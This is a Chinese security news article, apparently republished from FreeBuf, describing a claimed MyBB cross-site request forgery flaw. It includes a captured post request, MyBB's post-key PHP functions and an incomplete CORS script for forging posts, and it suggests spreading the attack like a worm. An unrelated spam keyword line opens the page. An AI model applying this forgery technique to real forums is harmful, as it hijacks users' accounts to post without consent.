自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

知名論壇系統(tǒng)MyBB被爆0day漏洞

作者:鳶尾
安全 漏洞
MyBB是國(guó)際上非常優(yōu)秀的免費(fèi)論壇軟件,最大的特色是簡(jiǎn)單但是功能卻出奇的強(qiáng)大。支持多國(guó)語(yǔ)言,可以分別設(shè)置前臺(tái)后臺(tái)的語(yǔ)言,每個(gè)用戶都可以設(shè)置自己使用何種語(yǔ)言訪問(wèn)論壇包括自己的時(shí)區(qū)等,自定義功能強(qiáng)大到?jīng)]有做不到只有想不到。

MyBB是國(guó)際上非常優(yōu)秀的免費(fèi)論壇軟件,最大的特色是簡(jiǎn)單但是功能卻出奇的強(qiáng)大。支持多國(guó)語(yǔ)言,可以分別設(shè)置前臺(tái)后臺(tái)的語(yǔ)言,每個(gè)用戶都可以設(shè)置自己使用何種語(yǔ)言訪問(wèn)論壇包括自己的時(shí)區(qū)等,自定義功能強(qiáng)大到?jīng)]有做不到只有想不到。

[[147404]]

漏洞影響多個(gè)版本

本次影響版本:1.6x & 1.8x

測(cè)試版本:1.8.3 (最新), 以及1.6.16 (1.6系列最新)

正是因?yàn)槠鋸?qiáng)大影響力,我便開始肆意玩耍MyBB以及監(jiān)控請(qǐng)求,在此期間我注意到一些極有可能導(dǎo)致漏洞出現(xiàn)的東西,這些都已經(jīng)在多個(gè)站點(diǎn)上進(jìn)行了測(cè)試。

測(cè)試過(guò)程

首先損壞MyBB很簡(jiǎn)單。當(dāng)你去發(fā)布一個(gè)新的帖子,在提交時(shí)它會(huì)請(qǐng)求一些東西,以下為來(lái)自Hackforums論壇post請(qǐng)求的示例:

POST http://www.hackforums.net/newreply.php?tid=4602700&processed=1 HTTP/1.1
Host: www.hackforums.net
User-Agent: Mozilla/5.0 (Windows NT 5.3; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.hackforums.net/newreply.php?tid=4602700
Cookie: *
Connection: keep-alive
Content-Type: multipart/form-data; boundary=------71842462512788
Content-Length: 1588
------71842462512788
Content-Disposition: form-data; name="my_post_key"
******
------71842462512788
Content-Disposition: form-data; name="message_new"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="message"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="submit"
Post Reply
------71842462512788
Content-Disposition: form-data; name="action"
do_newreply
------71842462512788
Content-Disposition: form-data; name="replyto"
------71842462512788
Content-Disposition: form-data; name="posthash"
******
------71842462512788
Content-Disposition: form-data; name="attachmentaid"
------71842462512788
Content-Disposition: form-data; name="attachmentact"
------71842462512788
Content-Disposition: form-data; name="subject"
*
------71842462512788
Content-Disposition: form-data; name="quoted_ids"
------71842462512788
Content-Disposition: form-data; name="tid"
4602700
------71842462512788--

對(duì)于MyBB這個(gè)系統(tǒng)我們已經(jīng)了解它的一些字段了,其中第一個(gè)就是post key,如果沒(méi)有這個(gè)字段,我們就不能發(fā)送任何帖子。獲取這個(gè)key十分簡(jiǎn)單,稍后我們會(huì)進(jìn)行詳細(xì)解釋?,F(xiàn)在我們需要獲取的是posthash,posthash僅僅只是一個(gè)MD5字符串,只需創(chuàng)建一個(gè)有效的MD5字符串就可以繞過(guò)它。我可以告訴你這是因?yàn)檎嘉环脑?,但是深究其?nèi)在不是我們今天要討論的問(wèn)題。

盯著message_new和message字段,MyBB會(huì)提交這兩個(gè)字段,然而它僅顯示message字段中的內(nèi)容,而不會(huì)顯示message_new字段中的內(nèi)容。所以你可以在之前的帖子message_new字段中寫入cocks,當(dāng)然你無(wú)法從帖子中看出與之前有什么不同。

如何生成post key

post key會(huì)依賴以下函數(shù):

function generate_post_check(){
    global $mybb, $session;
    if($mybb->user['uid'])
    {
        return md5($mybb->user['loginkey'].$mybb->user['salt'].$mybb->user['regdate']);
    }
    // Guests get a special string
    else
    {
        return md5($session->useragent.$mybb->config['database']['username'].$mybb->settings['internal']['encryption_key']);
    }}

接著驗(yàn)證post key是否調(diào)用該函數(shù):

function verify_post_check($code, $silent=false){
    global $lang;
    if(generate_post_check() != $code)
    {
        if($silent == true)
        {
            return false;
        }
        else
        {
            if(defined("IN_ADMINCP"))
            {
                return false;
            }
            else
            {
                error($lang->invalid_post_code);
            }
        }
    }
    else
    {
        return true;
    }}

然后我們會(huì)看到它在查找loginkey, salt, regdate信息。現(xiàn)在我們獲取這些信息是相當(dāng)?shù)娜菀?我不想過(guò)多解釋,這個(gè)確實(shí)太容易了)一旦獲得post key,只要其是可用的并且用戶還未更改密碼(目前大多數(shù)論壇用戶很少有經(jīng)常修改密碼的習(xí)慣)。

好了,這就開始我們的攻擊。首先我們需要確定一個(gè)攻擊目標(biāo)(我在本機(jī)上搭建了一個(gè)站點(diǎn)),接著我寫了一個(gè)CORS腳本,然后用戶通過(guò)瀏覽器點(diǎn)擊一個(gè)用來(lái)請(qǐng)求帖子內(nèi)容的URL,URL在另一端獲取到請(qǐng)求后,進(jìn)行處理但是不會(huì)進(jìn)行消息提示。假設(shè)你構(gòu)造了一個(gè)合法的請(qǐng)求,你將會(huì)看到網(wǎng)頁(yè)的變化。

如何使用

基于不同的需求,可以構(gòu)造不同的請(qǐng)求。這可用于提交帖子,獲取論壇榮譽(yù)點(diǎn)等。如果你想把這個(gè)漏洞搞的像是蠕蟲病毒一般,只需每個(gè)訪問(wèn)到帖子的人都在這個(gè)帖子下面繼續(xù)回復(fù)(這個(gè)需要把更多的精力放在獲取post key上),說(shuō)實(shí)話這種可能非常高!

CORS代碼

注意:這只是來(lái)自appsec-labs的示例代碼,你需要進(jìn)行一些修改以適合你的攻擊目標(biāo):

// I suggest adding jQuery to top of file// You will have to modify the code to make it more useable as I won't be modifying it for you.var url = 'http://forum.mytarget.com/';
$(document).ready(function() {
     corsMyBBPost();});function corsMyBBPost(){
    for(i=0; i<times; i++)
    {
        cors_send("post", url + "?proof_of_concept=1&req_num=" + i, "post=data", false);
    }}function cors_send(method, url, data, credentials){
    var cors;
    if (window.XDomainRequest)
    {
        cors = new XDomainRequest();
        if (cors)
        {
            cors.onprogress = function() { CORSstatus("Process") };
            cors.onload = function() { CORSresult(cors.responseText) };
        }
        else
            CORSstatus("Browser does not support Cross Origin Request");
    }
    else if (window.XMLHttpRequest)
    {
        cors = new XMLHttpRequest();
        cors.onreadystatechange = function() {
            if (cors.readyState == 4)
                CORSresult(cors.getAllResponseHeaders(), cors.responseText);
            else
                CORSstatus("Process");
            }
    }
    else
    {
        CORSstatus("Browser does not support AJAX");
    }
    method = method.toUpperCase();
    if (method == "POST" || method == "PUT")
        cors.open(method, url, data);
    else
        cors.open(method, url);
    if (credentials)
        cors.withCredentials = "true";
    cors.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    cors.send(data);
    CORSstatus("Cross Origin Resource Sharing - Start");}function CORSstatus(msg) {
     console.log(msg);}function CORSerror(msg) {
     console.log("Oh shit..." + msg);}

不加任何修飾,這代碼十分簡(jiǎn)潔。在此我不會(huì)描述如何盜取post key的方法,如果你自己有何領(lǐng)悟那是你自己的事情。

最后,希望大家能夠從中多學(xué)多一些東西。

最重要的是:玩的開心便好!

責(zé)任編輯:藍(lán)雨淚 來(lái)源: FreeBuf
0day漏洞MyBB
相關(guān)推薦

2013-05-24 14:02:42

2009-09-09 08:54:50

2009-07-06 13:15:07

2011-03-15 15:14:22

2021-10-06 13:48:50

0day漏洞攻擊

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2015-05-20 16:34:14

2015-10-12 10:07:19

2021-04-15 19:48:38

0day漏洞Chrome

2024-10-17 16:25:20

2021-04-17 15:14:24

微信0day漏洞

2022-03-25 13:41:55

漏洞網(wǎng)絡(luò)攻擊Quantum(量子

2011-08-26 11:44:01

2022-03-30 09:09:39

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2011-02-28 09:34:55

2010-05-21 09:55:26

2021-07-14 17:17:45

0day漏洞惡意代碼

2010-01-20 16:13:15

2020-12-17 10:28:27

漏洞網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)安全

2010-07-22 10:13:34

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)